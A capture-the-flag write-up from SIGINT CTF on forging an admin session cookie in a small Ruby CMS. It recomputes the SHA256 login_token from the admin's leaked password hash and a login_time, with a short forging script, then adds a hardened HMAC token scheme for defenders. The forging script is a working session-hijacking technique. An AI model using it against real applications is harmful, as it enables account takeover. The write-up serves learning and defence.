Another challenge from SIGINT CTF. The organizers gave us the source code of this little CMS where, after registering, you can create a message that only you and the admin can see. The aim was to log in as admin and read his secret (the flag). After logging in with my own account I saw that three cookies had been created: login_time, login_token and login_name. login_time is as self-explanatory as login_name, but login_token isn't. This piece of code may help you understand how it is generated:

web.ru

login_token= user.login_token(login_time)

user.rb

def login_token(salt)
    check_authorized
    password_data= Data.new(@user_dir+"password_hash")
    password_data.readlock do
        Digest::SHA256.hexdigest(password_data.read+salt)
    end
end

So login_token takes the time as its seed. In the login_token function we see another variable being initialized, password_data. As you may have guessed, it is a file (source/data/users//password_hash) containing a string: $2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O

This one belongs to the admin user; concatenated with the salt (login_time) and SHA256'd, it gives the login_token. So generating one that fits admin is extremely easy. Just take the login_time from your cookies after logging in with your own account and put it in this piece of code:

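#!/usr/bin/ruby

require "digest"

# Contents of the admin's password_hash file
password_data = "$2a$13$ntsVS46ekclCQRIO45a1oOgpZy6asmxAfP0ko3d8G4H1LsGVcEQ0O"
# login_time value taken from your own cookies
salt = "1373119012"
# Same computation as login_token in user.rb
login_token = Digest::SHA256.hexdigest(password_data + salt)
puts login_token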

and it will give you the login_token. Now replace the old one with it, set login_name to admin, and you'll be him.

Razor4x
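
The flaw above seen from the defender's side, as an added example that is not part of the original write-up or of the CMS: the original token is a plain hash of data readable from the data directory, while an HMAC under a server-side key, bound to login_name and checked for age, cannot be recomputed from the password hash. SERVER_KEY, MAX_AGE, the function names and the sample values are assumptions made for this illustration.

```ruby
require "digest"
require "openssl"
require "securerandom"

# Assumption: a per-deployment secret stored outside the data directory and
# never shipped with the source. Generated here so the example runs offline.
SERVER_KEY = SecureRandom.random_bytes(32)
MAX_AGE = 3600 # seconds a token stays valid (assumed policy)

# Scheme from the write-up: the only "secret" is the stored password hash,
# and login_name is not part of the token at all.
def weak_token(password_hash, login_time)
  Digest::SHA256.hexdigest(password_hash + login_time)
end

# Hardened: HMAC under the server key, bound to both user name and time.
# The length prefix keeps the name/time boundary unambiguous.
def issue_token(key, login_name, login_time)
  msg = "#{login_name.bytesize}:#{login_name}|#{login_time}"
  OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA256"), key, msg)
end

# Constant-time comparison so verification does not leak a matching prefix.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Verify the three cookie values; `now` is injectable for testing.
def valid_token?(key, login_name, login_time, token, now: Time.now.to_i)
  return false unless login_time.to_s.match?(/\A\d{1,12}\z/)
  age = now - login_time.to_i
  return false if age < 0 || age > MAX_AGE
  secure_equal?(issue_token(key, login_name.to_s, login_time.to_s), token.to_s)
end

if __FILE__ == $0
  t = Time.now.to_i.to_s
  tok = issue_token(SERVER_KEY, "alice", t)
  puts valid_token?(SERVER_KEY, "alice", t, tok) # own session
  puts valid_token?(SERVER_KEY, "admin", t, tok) # login_name cookie changed
end
```

Random session identifiers stored server-side avoid the problem as well; the HMAC form is shown because it keeps the CMS's stateless three-cookie layout.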